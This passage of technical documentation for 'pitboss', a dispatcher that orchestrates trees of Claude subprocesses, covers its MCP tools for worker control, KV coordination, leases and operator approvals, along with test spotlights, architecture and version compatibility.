Args: { "task_id": "string", "reason": "optional string" }
Returns: { "ok": true }
When reason is supplied, a synthetic [SYSTEM] reprompt is delivered to the killed actor’s direct parent lead. This lets the parent adapt without a separate reprompt_worker call.
pause_worker
Pause a running worker. Two modes:
mode | Behavior |
|---|---|
"cancel" (default) | Terminate the subprocess + snapshot claude_session_id. continue_worker spawns claude --resume. Zero context loss on Anthropic’s side; some reload cost on resume. |
"freeze" (v0.5+) | SIGSTOP the subprocess in place. continue_worker sends SIGCONT. No state loss at all, but long freezes risk Anthropic dropping the HTTP session — use for short pauses only. |
Args: { "task_id": "string", "mode": "cancel|freeze" }
Returns: { "ok": true }
Fails if the worker is not in Running state with an initialized session.
continue_worker
Resume a paused or frozen worker.
Args: { "task_id": "string", "prompt": "optional string" }
Returns: { "ok": true }
- For paused (cancel-mode) workers: spawns
claude --resume <session_id>. Optionalpromptis added to the resume. - For frozen workers: sends SIGCONT.
promptis ignored for frozen workers — usereprompt_workerafter continue if you want to redirect.
reprompt_worker
Mid-flight course correction: terminate and restart a worker with a new prompt, preserving the claude session via --resume.
Args: { "task_id": "string", "prompt": "string (required)" }
Returns: { "ok": true }
Differs from pause_worker + continue_worker in that the new prompt replaces the worker’s current direction rather than resuming it. Use when a worker has gone off-track and you want to give it an explicit correction.
Coordination & state tools
These tools are available to both leads and workers (though with different access levels depending on the namespace). They operate on the current layer’s in-memory KV store.
For guidance on when to use /leases/* (per-layer) vs run_lease_acquire (run-global), see Lease scope selection.
KV namespaces recap
| Namespace | Lead can write | Worker can write | Notes |
|---|---|---|---|
/ref/* | Yes | No | Lead-authored shared context for all workers |
/peer/<id>/* | Yes (any actor) | Only own path | Per-worker output slots |
/peer/self/* | Yes | Yes | Alias resolving to caller’s actor id |
/shared/* | Yes | Yes | Loose cross-worker coordination |
/leases/* | Managed | Managed | Via lease_acquire / lease_release only |
kv_get
Read a single entry.
Args: { "path": "/ref/config" }
Returns: { "entry": { "path": "...", "value": "bytes", "version": 1, "updated_at": "..." } | null }
Returns null in the entry field if the path does not exist (wrapped in a record per MCP spec).
kv_set
Write a value to a path. Increments the version on each write.
Args:
{
"path": "/shared/findings/my-result",
"value": "bytes (UTF-8 string or base64)",
"override_flag": false
}
Returns: { "version": 2 }
- Workers can only write to their own
/peer/<self>/*or/shared/*. Writing to another worker’s/peer/<X>/*returnsForbidden. override_flag— reserved; currently unused.
kv_cas
Compare-and-swap: write only if the current version matches.
Args:
{
"path": "/shared/counter",
"expected_version": 3,
"new_value": "bytes",
"override_flag": false
}
Returns: { "version": 4, "swapped": true }
swapped: falsemeans the version didn’t match; the write was not applied.- Use
kv_caswhen multiple workers might write the same path to avoid lost updates.
kv_list
List entries matching a glob pattern.
Args: { "glob": "/shared/findings/*" }
Returns: { "entries": [{ "path": "...", "version": 1, "updated_at": "..." }, ...] }
Returns metadata only (no values). Follow up with kv_get for values.
kv_wait
Block until a path reaches a minimum version. Useful for workers to wait until the lead writes a shared configuration, or for the lead to wait until a worker writes its result.
Args:
{
"path": "/peer/self/completed",
"timeout_secs": 60,
"min_version": 1
}
Returns: Entry when the condition is met. Times out with an error if timeout_secs elapses.
lease_acquire
Acquire a named mutex within the current layer. Auto-released on actor termination.
Args:
{
"name": "/leases/output-file",
"ttl_secs": 30,
"wait_secs": 10
}
Returns: { "lease_id": "uuid", "version": 1, "acquired_at": "...", "expires_at": "..." }
nameis a path under/leases/*.ttl_secs— how long the lease lives after acquisition.wait_secs— block up to this many seconds for the lease to become available. If omitted, fail immediately if already held.- The error message on contention names the current holder, so the requesting actor knows who to wait on.
lease_release
Release a held lease.
Args: { "lease_id": "uuid" }
Returns: { "ok": true }
run_lease_acquire (v0.6+)
Acquire a run-global mutex. Scoped to the entire dispatch (not per-layer). Use for resources that span sub-trees.
Args: { "key": "string", "ttl_secs": 30 }
Returns: { "lease_id": "uuid", "version": 1 }
Auto-released on actor termination, same as per-layer leases.
run_lease_release (v0.6+)
Release a run-global lease.
Args: { "lease_id": "uuid" }
Returns: { "ok": true }
Coordination patterns
Lead writes a shared config; workers read it
# Lead:
kv_set(path="/ref/config", value="target: main branch")
# Workers (in prompt):
Read /ref/config via mcp__pitboss__kv_get. Then proceed with the task.
Worker signals completion; lead polls
# Worker:
kv_set(path="/peer/self/done", value="true")
# Lead:
kv_wait(path="/peer/<worker-id>/done", timeout_secs=120, min_version=1)
Workers coordinate via CAS counter
# Worker (pseudo):
while true:
entry = kv_get("/shared/next-chunk")
n = entry.version
result = kv_cas("/shared/next-chunk", expected_version=n, new_value=str(n+1))
if result.swapped:
process_chunk(n)
break
# else: another worker got there first, retry
For a canonical reference, see AGENTS.md in the source tree.
Approval tools
These tools are available to the lead (and sub-leads). Workers cannot call approval tools.
For the operator-side view (TUI, [[approval_policy]] rules, [run].approval_policy), see Approvals.
request_approval
Gate a single in-flight action on operator approval. The lead blocks until the operator approves, rejects, or edits.
Args:
{
"summary": "string (required)",
"timeout_secs": 60,
"plan": {
"summary": "string (required)",
"rationale": "string",
"resources": ["list of files/APIs/PRs that will be touched"],
"risks": ["known failure modes"],
"rollback": "how to undo if something goes wrong"
},
"tool_name": "string (optional hint for policy matching)",
"cost_estimate": 0.05
}
Returns:
{
"approved": true,
"comment": "optional operator comment",
"edited_summary": "optional operator-edited version of summary"
}
Notes:
- The
planfield is optional for simple approvals but strongly recommended for non-trivial actions (deletions, multi-file edits, irreversible operations). tool_nameandcost_estimateare hints that allow[[approval_policy]]rules to match ontool_name/cost_overcriteria.- Policy rules (if configured) are evaluated before the request reaches the operator queue. A matching
auto_approveorauto_rejectrule skips the operator entirely.
propose_plan
Gate the entire run on operator pre-flight approval. Submit an execution plan before spawning any workers.
Args:
{
"plan": {
"summary": "string (required)",
"rationale": "string",
"resources": ["files, services, PRs that will be touched"],
"risks": ["known failure modes"],
"rollback": "how to undo"
},
"timeout_secs": 120
}
Returns: Same shape as request_approval.
Notes:
- When
[run].require_plan_approval = true,spawn_workerrefuses until apropose_plancall has receivedapproved: true. - The TUI modal shows
[PRE-FLIGHT PLAN]in the title (vs[IN-FLIGHT ACTION]forrequest_approval) so operators can tell them apart. - On rejection, the gate stays closed — the lead can revise and call
propose_planagain. - When
require_plan_approval = false(the default), callingpropose_planis informational only —spawn_workernever checks the result.
ApprovalPlan schema
{
"summary": "required; appears in the modal title",
"rationale": "optional; why this action should be taken",
"resources": ["optional; files, APIs, PRs that will be touched"],
"risks": ["optional; known failure modes — TUI highlights these in warning color"],
"rollback": "optional; how to undo if something goes wrong"
}
Use the structured plan form for any non-trivial approval. The bare summary string form (no plan field) still works for simple approvals.
Approval TTL and fallback (v0.6+)
Prevent an unreachable operator from permanently stalling the tree:
timeout_secsin the call sets a per-approval TTL.- A background watcher applies the run-level
approval_policyas the fallback when the TTL expires.
If approval_policy = "auto_reject" and a lead calls request_approval with timeout_secs = 30, the approval auto-rejects after 30 seconds if no operator responds.
Reject-with-reason
When an operator rejects with a reason comment, the reason flows back in comment. The lead can use it to adapt immediately — for example, switching output format — without a separate reprompt_worker call.
Example prompt pattern:
result = request_approval(summary="Write results as JSON?", ...)
if not result.approved:
# result.comment might say "use CSV, not JSON"
write_as_csv(findings)
Cookbook — Spotlights overview
The dogfood spotlights are repeatable end-to-end tests that prove pitboss v0.6 features work from the operator’s perspective. They drive the real pitboss dispatch CLI or in-process integration tests — not just unit tests of the library.
All spotlight source files live under examples/dogfood/ in the repository.
Running spotlights
Shell script (subprocess demo):
bash examples/dogfood/fake/01-smoke-hello-sublead/run.sh
All dogfood tests via Cargo:
cargo test --test dogfood_fake_flows
Full suite:
cargo test --workspace --quiet
Fake vs. real spotlights
fake/ spotlights use the fake-claude binary with pre-baked JSONL scripts. Fully deterministic, fast (~1s), no Anthropic API calls.
real/ spotlights (R1–R3) use the actual claude binary. They require PITBOSS_DOGFOOD_REAL=1 and a valid Anthropic API key. They count against your quota.
Spotlight index
Fake spotlights
| # | Name | What it proves | Cargo test |
|---|---|---|---|
| 01 | smoke-hello-sublead | Depth-2 manifest dispatches; allow_subleads, max_subleads, [lead.sublead_defaults] all parse and resolve. summary.json shows tasks_failed=0. | cargo test --test dogfood_fake_flows |
| 02 | Strict-tree isolation | Per-layer KV isolation; root cannot read sub-tree state without read_down; strict peer visibility. | dogfood_isolation_strict_tree |
| 03 | Kill-cascade drain | Root cancel cascades depth-first through all sub-leads and workers within 200ms. | dogfood_kill_cascade_drain |
| 04 | Run-global lease contention | Two sub-leads competing for the same run_lease_acquire key serialize correctly. | dogfood_run_lease_contention |
| 05 | Approval policy auto-filter | [[approval_policy]] rules auto-approve matching requests before they reach the operator queue. | dogfood_policy_auto_filter |
| 06 | Envelope cap enforcement | max_sublead_budget_usd cap rejects oversized spawn attempts pre-state; clean retry succeeds. | dogfood_envelope_cap_rejection |
Real spotlights (API-gated)
| # | Name | Notes |
|---|---|---|
| R1 | real-root-spawns-sublead | Real haiku lead calls spawn_sublead at least once. ~$0.05. |
| R2 | real-kill-with-reason | Kill-with-reason stub (full orchestration deferred). |
| R3 | real-reject-with-reason | Lead adapts output format after auto_reject approval response. |
Real spotlights are in examples/dogfood/real/. Run with:
PITBOSS_DOGFOOD_REAL=1 cargo test --test dogfood_real_flows -- --ignored
Spotlight #02: Strict-tree isolation
Source: examples/dogfood/fake/02-isolation-strict-tree/
What it demonstrates
This spotlight exercises per-layer KV store isolation and strict peer visibility in a depth-2 dispatch.
A root lead decomposes a multi-phase job into two parallel sub-trees:
- S1 — “phase 1: gather inputs”
- S2 — “phase 2: process outputs”
Each sub-lead writes its progress to /shared/progress. The spotlight proves:
-
KV isolation: S1’s
/shared/progressand S2’s/shared/progresslive in separate layer stores. Each sub-lead reads back its own write; neither can observe the other’s. -
Root isolation: Root’s
/shared/progressis in a third, independent store. After S1 and S2 write their progress, root’s layer still has no entry at that path. -
Strict peer visibility: Workers within the same layer cannot read each other’s
/peer/<id>/*slots. The MCP server rejects such reads with a “strict peer visibility” error. -
Layer-lead privilege: The root lead (as layer lead of the root layer) CAN read any worker’s
/peer/<id>/*slot in the root layer.
How to run
This spotlight is verified via an in-process integration test (no real subprocess or API dependency):
cargo test --test dogfood_fake_flows dogfood_isolation_strict_tree
The test constructs a DispatchState and McpServer in-process and drives them via FakeMcpClient over a Unix socket.
The run.sh script prints instructions pointing to this cargo invocation.
Key assertions
See expected-observables.md for the full plain-English description of expected behavior.
Why this matters
Without strict-tree isolation, a noisy sub-tree could observe another sub-tree’s partial state and corrupt its coordination logic. The KV isolation guarantee means each sub-tree can be reasoned about independently — operators can audit one phase without worrying about contamination from another.
Related concepts
- Depth-2 sub-leads — authorization model
- Leases & coordination — KV namespaces
- Architecture: The two-layer model — how layers are structured
Spotlight #03: Kill-cascade drain
Source: examples/dogfood/fake/03-kill-cascade-drain/
What it demonstrates
This spotlight exercises depth-first cascade cancellation with a grace window in a depth-2 dispatch.
Scenario: An operator kicks off a long-running dispatch — a root lead that has spawned two sub-leads (S1 for “phase 1” and S2 for “phase 2”), each with two active workers. Partway through, the operator realizes something is wrong (wrong prompt, runaway cost, unexpected output) and presses cancel.
Within the drain grace window, the root cancel cascades depth-first through the entire sub-tree:
- Root cancel token is triggered
- Each sub-lead’s cancel token is triggered
- Each sub-lead’s worker cancel tokens are triggered
No straggler processes are left running and burning budget.
How to run
cargo test --test dogfood_fake_flows dogfood_kill_cascade_drain
The test constructs a DispatchState and McpServer in-process, spawns two sub-leads via the MCP spawn_sublead tool, injects two simulated worker cancel tokens into each sub-tree, triggers root cancel, and asserts that every token in the tree reaches the draining state within 200ms.
The run.sh script prints instructions pointing to this cargo invocation.
Why cascade matters
Without explicit cascade, cancelling root would stop the root lead process but sub-lead sessions and their workers would keep running — consuming API budget and writing to the shared store — until they timed out or were killed by an external signal.
The cascade watcher installed by install_cascade_cancel_watcher ensures the drain signal propagates to every node in the tree synchronously within the tokio event loop. The full dispatch shuts down cleanly inside the grace window.
Key assertions
See expected-observables.md for the full scenario with timing expectations.
Related concepts
- Depth-2 sub-leads — cancel cascade section
- Architecture: The two-layer model — tree structure
- TUI —
Xkey cancels entire run
Spotlight #04: Run-global lease contention
Source: examples/dogfood/fake/04-run-lease-contention/
What it demonstrates
This spotlight exercises run-global lease coordination across sub-trees in a depth-2 dispatch.
Scenario: An operator has a shared filesystem resource (e.g., output.json) that multiple sub-leads need exclusive write access to. The run-global lease API (run_lease_acquire / run_lease_release) provides cross-tree coordination.
Two sub-leads (S1 and S2) compete for the same lease key:
- S1 acquires the lease first and holds it successfully
- S2 attempts to acquire the same lease — blocked, with S1 named as current holder
- S1 releases the lease
- S2 retries and acquires successfully
How to run
cargo test --test dogfood_fake_flows dogfood_run_lease_contention
The test constructs a DispatchState and McpServer in-process, spawns two sub-leads, drives them through the acquire/release dance, and asserts that blocking, release, and reacquisition work correctly.
The run.sh script prints instructions pointing to this cargo invocation.
The key distinction this spotlight demonstrates
| Lease type | Scope | Use for |
|---|---|---|
/leases/* via lease_acquire | Per-layer (sub-tree internal) | Resources only one sub-tree writes to |
run_lease_acquire | Run-global (spans all sub-trees) | Operator filesystem paths, shared services |
If S1 and S2 used per-layer /leases/* instead of run_lease_acquire, they would each get their own independent /leases/output-file with no contention — which is wrong when they’re both trying to write the same real file.
Key assertions
See expected-observables.md for the full scenario with expected lease state transitions.
Related concepts
- Leases & coordination — per-layer vs run-global
- Architecture: Lease scope selection — decision guide
- Coordination & state —
run_lease_acquire/run_lease_releasesignatures
Spotlight #05: Approval policy auto-filter
Source: examples/dogfood/fake/05-policy-auto-filter/
What it demonstrates
This spotlight exercises [[approval_policy]] declarative auto-filtering in a depth-2 dispatch.
Scenario: An operator configures a deterministic policy to auto-approve routine tool-use from a trusted sub-lead (S1) while blocking plan-category approvals — reducing approval noise at scale.
The spotlight proves four things:
-
Rule-based auto-approval: When S1 requests tool-use approval, Rule 1 (
actor = root→S1,category = ToolUse) immediately approves without operator involvement. -
Actor-specific filtering: S2 makes an identical tool-use request, but since Rule 1 only matches
root→S1, S2’s request falls through to the operator queue. -
Category-based blocking: When S1 submits a plan approval, Rule 2 (
category = Plan,action = block) forces operator review regardless of actor. -
Reduced operator noise: Only non-matching requests land in the operator’s queue. S1’s routine tool-use never alerts the operator.
The policy configuration
[[approval_policy]]
match = { actor = "root→S1", category = "tool_use" }
action = "auto_approve"
[[approval_policy]]
match = { category = "plan" }
action = "block"
First-match-wins. A request from S1 with category = ToolUse matches Rule 1 → auto-approved. A request from S1 with category = Plan does not match Rule 1 (wrong category) → falls to Rule 2 → blocked for operator.
How to run
cargo test --test dogfood_fake_flows dogfood_policy_auto_filter
The test:
- S1’s auto-approved request does not appear in the operator queue
- S2’s request and S1’s plan approval do appear in the queue
- Queue entries exist only for non-matching rules
The run.sh script prints instructions pointing to this cargo invocation.
Why deterministic rules (not LLM-evaluated)
Approval policies are Rust-evaluated — always deterministic, zero latency, auditable. This makes them suitable for high-volume auto-approvals (e.g., “trust S1’s read-only operations”) while LLM-based approval (via propose_plan or request_approval with a rich plan) handles judgment calls that genuinely need human review.
Key assertions
See expected-observables.md for the full expected behavior.
Related concepts
- Approvals —
[[approval_policy]]reference - MCP approvals —
request_approval/propose_plantool reference
Spotlight #06: Envelope cap enforcement
Source: examples/dogfood/fake/06-envelope-cap-rejection/
What it demonstrates
This spotlight exercises manifest-level budget cap enforcement with clean rejection semantics in a depth-2 dispatch.
Scenario: An operator sets max_sublead_budget_usd = 3.0 as a safety rail. A root lead attempts to spawn a sub-lead with budget_usd = 5.0 (either by bad design or runaway generation). The cap enforcement rejects the spawn cleanly — no partial state, no phantom reservation.
The spotlight proves four things:
-
Cap rejection is pre-state: When the envelope budget exceeds
max_sublead_budget_usd,spawn_subleadreturns an error before any state mutation. No half-spawned sub-lead is registered. -
Error message is actionable: The error names the cap (“exceeds per-sublead cap”), allowing Claude to understand the constraint and retry with a smaller budget.
-
Clean state after rejection: After a rejected spawn:
state.subleadsis empty (no partial registration)reserved_usd == 0(no phantom reservation)
-
Successful retry with compliant budget: Retrying with
budget_usd = 2.0(within the 3.0 cap) succeeds; the sub-lead is registered andreserved_usd = 2.0.
The manifest cap
[[lead]]
allow_subleads = true
max_sublead_budget_usd = 3.0
How to run
cargo test --test dogfood_fake_flows dogfood_envelope_cap_rejection
The test:
- Constructs a
DispatchStatewithmax_sublead_budget_usd = 3.0 - Attempts
spawn_sublead(budget_usd=5.0)→ expects MCP error - Verifies no partial state and no budget reserved
- Retries with
spawn_sublead(budget_usd=2.0)→ expects success
The run.sh script prints instructions pointing to this cargo invocation.
Why pre-state rejection matters
Failing before any state mutation keeps the dispatch state clean and predictable. A half-spawned sub-lead with a phantom budget reservation would be difficult to diagnose and could cause downstream spawn failures or incorrect budget accounting.
Key assertions
See expected-observables.md for the full expected behavior.
Related concepts
- Depth-2 sub-leads —
max_sublead_budget_usdand other manifest caps - Manifest schema —
[[lead]]field reference - Session control —
spawn_subleaderror conditions
Architecture overview
One-screen mental model
Pitboss is a dispatcher that manages a tree of claude subprocesses under operator-defined guardrails. In the simplest case (flat mode), it’s a process pool. In the full case (depth-2 hierarchical), it’s a two-tier tree with a control plane and shared coordination state.
Operator
│
├─ pitboss dispatch <manifest>
│ │
│ ├─ [root lead] ──────── MCP bridge (stdio↔unix socket)
│ │ │ │
│ │ │ MCP server ─────┘
│ │ │ │
│ │ │ ├─ DispatchState (root layer)
│ │ │ │ KvStore, LeaseRegistry, ApprovalQueue
│ │ │ │
│ │ ├─ spawn_sublead ──┤
│ │ │ │ ├─ LayerState (sub-lead S1)
│ │ │ │ │ KvStore, workers, budget
│ │ │ │ │
│ │ │ └─ [S1 lead] ──── spawn_worker → [W1, W2, W3]
│ │ │
│ │ └─ spawn_sublead ──┤
│ │ ├─ LayerState (sub-lead S2)
│ │ │
│ │ └─ [S2 lead] ──── spawn_worker → [W4, W5]
│ │
│ └─ control.sock ─────── pitboss-tui (operator floor view)
│
└─ run artifacts: ~/.local/share/pitboss/runs/<run-id>/
Key components
Dispatcher (pitboss)
The CLI binary. Reads the manifest, validates it, sets up the run directory, and kicks off the dispatch. In flat mode, it starts a process pool directly. In hierarchical mode, it starts the MCP server and spawns the lead subprocess with a generated --mcp-config.
MCP server
Listens on a unix socket per run. Receives tool calls from leads (and workers) via the bridge proxy. All tool handlers route through DispatchState for authorization and state mutation.
The bridge
pitboss mcp-bridge <socket> — a stdio-to-socket proxy auto-launched for each claude subprocess that needs MCP access. Claude Code speaks stdio JSON-RPC; the pitboss MCP server speaks unix socket. The bridge translates between them and stamps _meta (actor identity) into each forwarded call.
DispatchState
The root state object. In v0.6+, it wraps an Arc<LayerState> for the root layer plus a registry of sub-lead LayerState objects. All MCP tool handlers receive a DispatchState reference and use it to locate the right layer for authorization and coordination.
LayerState
Per-layer state: the layer’s KvStore, worker registry, budget tracking, ApprovalQueue, and cancel tokens. Workers within a layer share one LayerState. Sub-leads each get their own LayerState — this is what provides isolation.
Control socket
A unix socket (control.sock) in the run directory that the TUI connects to. The TUI sends control operations (cancel, pause, reprompt, approve) and receives push events (worker state changes, approval requests, budget updates). The dispatcher applies operations to DispatchState and broadcasts events back.
TUI (pitboss-tui)
A ratatui terminal application that connects to the control socket of a running dispatch. Reads-only for finished runs (no control socket). See TUI for the operator interface.
Data flow: a worker spawn
- Lead calls
mcp__pitboss__spawn_workervia its MCP bridge subprocess. - Bridge reads the stdio request and forwards it to the MCP server on the unix socket, adding
_meta.actor_idfrom its--actor-idarg. - MCP server handler receives the call, looks up the caller’s layer in
DispatchState, and validates the request (budget, worker cap, plan gate). - Dispatcher spawns a
claudesubprocess with generated--mcp-config(for workers: shared-store tools only) and a new worktree. - Worker’s task id and worktree path are returned to the lead via MCP response.
- TUI receives a
WorkerSpawnedpush event from the control socket and renders a new tile.
Philosophy
The model is stochastic. The pit is not.
Pitboss bets on four guarantees:
- Isolation. Each worker runs in its own git worktree. One bad hand doesn’t contaminate the next.
- Observability. Every token, every cache hit, every session id is persisted. The artifacts are on the table.
- Bounded risk. Workers, budget, and timeouts are explicit. The house knows its exposure before the first card is dealt.
- Determinism where it’s free. Stream-JSON parsing, cancellation protocol, KV authorization, approval policy matching — all Rust, all deterministic, none LLM-evaluated.
For deeper dives, see The two-layer model and Lease scope selection.
The two-layer model
Pitboss v0.6 introduced a second coordination tier. Understanding the layer structure is essential for writing correct depth-2 manifests.
Layers
A layer is the scope within which workers and leads share coordination state (KV store, leases, approval queue). In the v0.6 model:
- Root layer — always present. Contains the root lead, any direct workers the root lead spawns, and the run-global lease registry.
- Sub-lead layers — one per spawned sub-lead. Each sub-lead layer contains that sub-lead’s lead session and the workers it spawns.
Workers remain terminal: they cannot spawn anything. A sub-lead is a lead within its own layer; it can spawn workers but not other sub-leads.
Root layer
├─ root lead (reads/writes root KvStore)
├─ worker W0 (if root lead calls spawn_worker directly)
└─ run-global LeaseRegistry (spans all layers)
Sub-lead S1 layer
├─ sub-lead S1 (reads/writes S1 KvStore)
├─ worker W1
└─ worker W2
Sub-lead S2 layer
├─ sub-lead S2 (reads/writes S2 KvStore)
├─ worker W3
└─ worker W4
Isolation by default
Sub-tree layers are opaque to root unless read_down = true is passed at spawn_sublead time. This means:
- The root lead cannot
kv_getany path from S1’s or S2’s layer. - S1 cannot
kv_getany path from S2’s layer or the root layer. - Workers within S1 cannot see each other’s
/peer/<X>/*slots; only S1’s lead and the operator can.
This isolation is not just a convention — it’s enforced at the MCP tool handler layer.
The read_down escape hatch
When the root lead calls spawn_sublead(..., read_down=true), the root gains read access into that sub-tree’s KV namespace. Write access is never granted to the root for sub-tree namespaces (the sub-lead’s workers must remain the writers).
Use read_down when:
- The root lead’s synthesis step needs to observe sub-tree progress without going through explicit handoff patterns (like
/peer/S1/done). - You’re building a monitoring-style root that reports on all sub-tree states.
Avoid read_down when you want strict phase isolation — if Phase 1 shouldn’t influence Phase 2’s context, don’t give root visibility that it might inadvertently surface in Phase 2’s prompt.
The operator is always super-user
The TUI can read and write across all layers regardless of read_down. This is intentional: the operator needs unrestricted visibility for debugging and approval decisions.
Sub-leads as peers in the root layer
Sub-leads are not workers in the root layer. They appear as sub-tree containers in the TUI, not as worker tiles. The root lead tracks sub-leads via sublead_id (returned by spawn_sublead) and waits on them via wait_actor.
From the root lead’s perspective:
spawn_worker→ creates a worker tile in the root layerspawn_sublead→ creates a sub-tree with its own layer
Both return identifiers the root lead can use with wait_actor.
Budget flow
Budget flows hierarchically:
- Operator sets
budget_usd = 20.00on the run. - Root lead calls
spawn_sublead(budget_usd=5.0)→ $5 is reserved from the root budget. - Sub-lead S1 spawns workers; each worker spawn reserves an estimate from S1’s $5 envelope.
- When S1 terminates, any unspent envelope returns to the root’s reservable pool.
The max_sublead_budget_usd manifest cap enforces an upper bound on any single sub-lead envelope, regardless of what the root lead requests.
Cancel cascade
Cancellation propagates depth-first. A root cancel:
- Trips the root layer’s drain token.
- The cascade watcher finds all registered sub-leads and trips their cancel tokens.
- Each sub-lead’s cancel triggers its worker cancel tokens.
The two-phase drain at each layer ensures no straggler processes. Sub-leads spawned mid-drain are caught by a spawn-time is_draining() check.
Kill-with-reason routing
cancel_worker(task_id, reason) routes one hop upward:
- Cancel a worker → the worker’s layer lead (sub-lead or root) receives the synthetic
[SYSTEM]reprompt. - Cancel a sub-lead → the root lead receives the reprompt.
The root lead is never notified for cancels that stay within a sub-tree it doesn’t own (unless it has read_down = true and is observing).
Lease scope selection
Pitboss provides two lease primitives. Choosing the right one prevents silent cross-tree collisions.
Quick rule
| Resource | Primitive to use |
|---|---|
| Internal to one sub-tree | /leases/* via lease_acquire |
| Shared across sub-trees | run_lease_acquire |
| When in doubt | run_lease_acquire |
Over-serializing is always safer than silent collision.
The two primitives
Per-layer leases: lease_acquire / lease_release
Each layer (root, S1, S2, …) has its own KvStore with its own /leases/* namespace. A lease acquired by an actor in S1 at path /leases/output-file is entirely separate from a lease acquired by an actor in S2 at the same path.
This isolation is by design. It means sub-trees can coordinate internally without knowing about each other. It also means per-layer leases provide no cross-tree serialization.
Use per-layer leases for:
- A chunk-processing counter within one phase’s workers
- A mutex for a temporary file that only one sub-tree touches
- Any resource fully scoped to a single sub-tree’s lifetime
Run-global leases: run_lease_acquire / run_lease_release
Run-global leases live on DispatchState (outside any layer) in a dedicated LeaseRegistry. A lease acquired at key "output.json" by S1 blocks S2 from acquiring the same key.
Use run-global leases for:
- A path on the operator’s filesystem that multiple sub-trees write to
- A shared service or network port that only one phase should use at a time
- Any resource that must be serialized across the entire dispatch tree
Why the split exists
Sub-tree isolation is a core guarantee. If per-layer leases were globally shared, one sub-tree’s lock could block an unrelated sub-tree — violating isolation and making sub-tree behavior dependent on sibling activity.
The run-global lease registry exists as a deliberate, explicit cross-tree escape hatch. Because it’s separate and explicitly invoked, operators and leads can reason about which resources are cross-tree-serialized without inspecting sibling sub-trees.
Auto-release on termination
Both primitive types auto-release their leases when the holding actor’s MCP session terminates (connection drop, worker crash, Ctrl-C). This prevents deadlocks from crashed workers holding leases indefinitely.
The TTL (ttl_secs) is a belt-and-suspenders backup: if the auto-release misses (e.g., an ungraceful socket close), the lease expires after the TTL.
Debugging lease contention
When run_lease_acquire or lease_acquire returns a contention error, the error message names the current holder:
lease "output.json" held by actor <uuid> (S1→W2), expires in 28s
This lets the waiting actor know whether to retry immediately (holder is about to expire) or wait for an explicit release.
Spotlight
Spotlight #04 (Run-global lease contention) demonstrates the full acquire/block/release/retry sequence in a runnable test.
Changelog
{{#include ../../CHANGELOG.md}}
Compatibility
Pitboss makes specific backward-compatibility guarantees at each version boundary. This page summarizes the current compatibility posture for operators upgrading to or running v0.6.
v0.6.0 — depth-2 sub-leads
Backward compatible with v0.5
v0.6 is fully backward-compatible with v0.5 manifests and tooling:
- Manifests: v0.5 manifests (flat mode, hierarchical without
allow_subleads) run unchanged.allow_subleadsdefaults tofalse; no new fields are required. - MCP callers: v0.5 leads that only call
spawn_worker,wait_for_worker,list_workers, etc. work identically. New tools (spawn_sublead,wait_actor,run_lease_acquire,run_lease_release) are additive and not required. - Control-plane clients: TUI sessions connected to a v0.6 dispatcher behave identically when no sub-leads are spawned. New TUI elements (grouped grid, approval list pane) appear only when depth-2 features are used.
- Wire format:
EventEnvelopeaddsactor_path(e.g.,"root→S1→W3") withserde(skip_serializing_if = "ActorPath::is_empty"), so v0.5 consumers parsing event streams see no change for flat or depth-1 runs. - On-disk run artifacts:
summary.jsonschema is backward-compatible. New fields added with#[serde(default)]; pre-v0.6 records parse cleanly. - SQLite: All schema migrations are idempotent. Opening a v0.5 database under v0.6 auto-migrates.
Nothing removed in v0.6
No tools, manifest fields, CLI subcommands, or TUI behaviors were removed in v0.6. wait_for_worker is retained as a back-compat alias for wait_actor.
v0.5.0
Backward compatible with v0.4
- v0.4.x manifests run unchanged.
require_plan_approvaldefaults tofalse. pause_workergains amodefield; the default ("cancel") matches v0.4 behavior.approval_policydefaults to"block", matching v0.4.- v0.4.x run directories deserialize with new counter fields defaulting to 0.
v0.4.0
Backward compatible with v0.3
- v0.3.x manifests run unchanged.
approval_policydefaults to"block". - v0.3.x on-disk runs:
control.sockabsent → TUI enters observe-only mode. parent_task_idonTaskRecorduses#[serde(default)]; v0.3 records parse asnull.
Forward-looking guarantees
Pitboss follows Semantic Versioning:
- Patch versions (0.6.x) — bug fixes only; no schema or API changes.
- Minor versions (0.7+) — additive features; existing manifests and callers continue to work.
- Major version (1.0) — reserved for breaking changes. None currently planned.
The authoritative guide to what changed in each version is CHANGELOG.md in this book (sourced directly from the repository’s CHANGELOG.md).
Checking compatibility
pitboss validate pitboss.toml
pitboss validate is the runtime source of truth. If a manifest field doesn’t parse, validate will report it. The binary always wins over documentation — file a PR if something here is wrong.